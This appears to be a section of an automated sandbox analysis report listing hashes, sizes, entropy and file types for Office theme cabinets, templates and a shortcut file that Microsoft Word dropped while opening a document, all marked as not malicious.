                                        MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                        SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                        SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                        SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1065873
                                        Entropy (8bit):7.998277814657051
                                        Encrypted:true
                                        SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                        MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                        SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                        SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                        SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1097591
                                        Entropy (8bit):7.99825462915052
                                        Encrypted:true
                                        SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                        MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                        SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                        SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                        SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1310275
                                        Entropy (8bit):7.9985829899274385
                                        Encrypted:true
                                        SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                        MD5:9C9F49A47222C18025CC25575337A965
                                        SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                        SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                        SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1766185
                                        Entropy (8bit):7.9991290831091115
                                        Encrypted:true
                                        SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                        MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                        SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                        SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                        SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):1881952
                                        Entropy (8bit):7.999066394602922
                                        Encrypted:true
                                        SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                        MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                        SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                        SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                        SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):2527736
                                        Entropy (8bit):7.992272975565323
                                        Encrypted:true
                                        SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                        MD5:F256ACA509B4C6C0144D278C7036B0A8
                                        SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                        SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                        SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):2591108
                                        Entropy (8bit):7.999030891647433
                                        Encrypted:true
                                        SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                        MD5:BEB12A0464D096CA33BAEA4352CE800F
                                        SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                        SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                        SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):3256855
                                        Entropy (8bit):7.996842935632312
                                        Encrypted:true
                                        SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                        MD5:8867BDF5FC754DA9DA6F5BA341334595
                                        SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                        SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                        SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):3417042
                                        Entropy (8bit):7.997652455069165
                                        Encrypted:true
                                        SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                        MD5:749C3615E54C8E6875518CFD84E5A1B2
                                        SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                        SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                        SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):30
                                        Entropy (8bit):1.2389205950315936
                                        Encrypted:false
                                        SSDEEP:3:/Bh/X:
                                        MD5:1948E2092C1A74E051E058E6C63E5268
                                        SHA1:68BD89CE7384A83B68728E691510C2AECFF4F335
                                        SHA-256:F684973FD19AD34B3455F82C0C220C774A46612E096164BDEB7A5255A54BBD97
                                        SHA-512:31BC21E64958C6B84A6BC47F956DDE93DCAD96C897CE014895E891AC8B71491895C53A02ED9632AB9C1506579DED3CAC082AA809A7C8A2D2AE89892F4195CD7E
                                        Malicious:false
                                        Preview:.....$........................
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 18 14:30:09 2024, mtime=Wed Dec 18 14:30:13 2024, atime=Wed Dec 18 14:30:09 2024, length=11302, window=hide
                                        Category:dropped
                                        Size (bytes):599
                                        Entropy (8bit):4.850423232363809
                                        Encrypted:false
                                        SSDEEP:12:8NmxhTISqfbTSHaY1kXI/Tz/Tsth+KtJaKtJzBmV:8N28z+PT/4L1tJBtJtm
                                        MD5:F4F37768BF39073EEAFF74552B946292
                                        SHA1:E9919E4AD7F0F0481F227A74F09B60C222F20F5C
                                        SHA-256:001558B67886E04F81F4000D6DA8C04B72B2F47389A38F06D098A9E5085E1418
                                        SHA-512:BD5D13F9D062F1AD1BD45FB910D18EFB247C070D3F98D82E59E8C4DB5D7D228B512C72E82A0329DEBD3732D6AF2FA9CAE8AE5A539F43E6D3ECB134EBCCF1DA30
                                        Malicious:false
                                        Preview:L..................F.... ...@...aQ..gg..aQ...`..aQ..&,......................f.d.2.&,...Y.{ .9C7B~1.DOC..J......Y.{.Y.{....).....................e.C..Q.y)R'Y<y.S..d.o.c.x...........$.......$...5...........^................F.......C:\Users\user\Desktop\???????.docx..C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\..Q.y)R'Y<y.S..d.o.c.x.......#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\..Q.y)R'Y<y.S..d.o.c.x.`.......X.......116938...........hT..CrF.f4... .../Tc...,......hT..CrF.f4... .../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Generic INItialization configuration [folders]
                                        Category:dropped
                                        Size (bytes):49
                                        Entropy (8bit):3.833016601078342
                                        Encrypted:false
                                        SSDEEP:3:HLRb6lm4Z8b6lv:HLRd0
                                        MD5:5225F92FC7C6204602FACAD1AFB9A0A2
                                        SHA1:1E04A8C70C9468DDB909077FF0226624CB35EDD9
                                        SHA-256:44D7281091105C2C6DFD80EB0E3291E5E0E1FC07E8F0F011AD83B37F3C0E9F9B
                                        SHA-512:14B51C5F0A4C68831243534869DDA3D839E5BF6C00AE18E4CA940D9251D65A911700B10899E8B7B9E1A80B6E85EA609DB36CAD7D5EAFF51EF261086B44950B33
                                        Malicious:false
                                        Preview:[misc]..???????.LNK=0..[folders]..???????.LNK=0..
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):562113
                                        Entropy (8bit):7.67409707491542
                                        Encrypted:false
                                        SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                        MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                        SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                        SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                        SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1649585
                                        Entropy (8bit):7.875240099125746
                                        Encrypted:false
                                        SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                        MD5:35200E94CEB3BB7A8B34B4E93E039023
                                        SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                        SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                        SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):558035
                                        Entropy (8bit):7.696653383430889
                                        Encrypted:false
                                        SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                        MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                        SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                        SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                        SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):570901
                                        Entropy (8bit):7.674434888248144
                                        Encrypted:false
                                        SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                        MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                        SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                        SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                        SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):523048
                                        Entropy (8bit):7.715248170753013
                                        Encrypted:false
                                        SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                        MD5:C276F590BB846309A5E30ADC35C502AD
                                        SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                        SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                        SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3078052
                                        Entropy (8bit):7.954129852655753
                                        Encrypted:false
                                        SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                        MD5:CDF98D6B111CF35576343B962EA5EEC6
                                        SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                        SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                        SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):777647
                                        Entropy (8bit):7.689662652914981
                                        Encrypted:false
                                        SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                        MD5:B30D2EF0FC261AECE90B62E9C5597379
                                        SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                        SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                        SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):924687
                                        Entropy (8bit):7.824849396154325
                                        Encrypted:false
                                        SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                        MD5:97EEC245165F2296139EF8D4D43BBB66
                                        SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                        SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                        SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):966946
                                        Entropy (8bit):7.8785200658952
                                        Encrypted:false
                                        SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                        MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                        SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                        SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                        SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1204049
                                        Entropy (8bit):7.92476783994848
                                        Encrypted:false
                                        SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                        MD5:FD5BBC58056522847B3B75750603DF0C
                                        SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                        SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                        SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):486596
                                        Entropy (8bit):7.668294441507828
                                        Encrypted:false
                                        SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                        MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                        SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                        SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                        SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):976001
                                        Entropy (8bit):7.791956689344336
                                        Encrypted:false
                                        SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                        MD5:9E563D44C28B9632A7CF4BD046161994
                                        SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                        SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                        SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):1463634
                                        Entropy (8bit):7.898382456989258
                                        Encrypted:false
                                        SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                        MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                        SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                        SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                        SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2218943
                                        Entropy (8bit):7.942378408801199
                                        Encrypted:false
                                        SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                        MD5:EE33FDA08FBF10EF6450B875717F8887
                                        SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                        SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                        SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1750795
                                        Entropy (8bit):7.892395931401988
                                        Encrypted:false
                                        SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                        MD5:529795E0B55926752462CBF32C14E738
                                        SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                        SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                        SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2924237
                                        Entropy (8bit):7.970803022812704
                                        Encrypted:false
                                        SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                        MD5:5AF1581E9E055B6E323129E4B07B1A45
                                        SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                        SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                        SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2357051
                                        Entropy (8bit):7.929430745829162
                                        Encrypted:false
                                        SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                        MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                        SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                        SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                        SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3611324
                                        Entropy (8bit):7.965784120725206
                                        Encrypted:false
                                        SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                        MD5:FB88BFB743EEA98506536FC44B053BD0
                                        SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                        SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                        SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1091485
                                        Entropy (8bit):7.906659368807194
                                        Encrypted:false
                                        SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                        MD5:2192871A20313BEC581B277E405C6322
                                        SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                        SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                        SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):608122
                                        Entropy (8bit):7.729143855239127
                                        Encrypted:false
                                        SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                        MD5:8BA551EEC497947FC39D1D48EC868B54
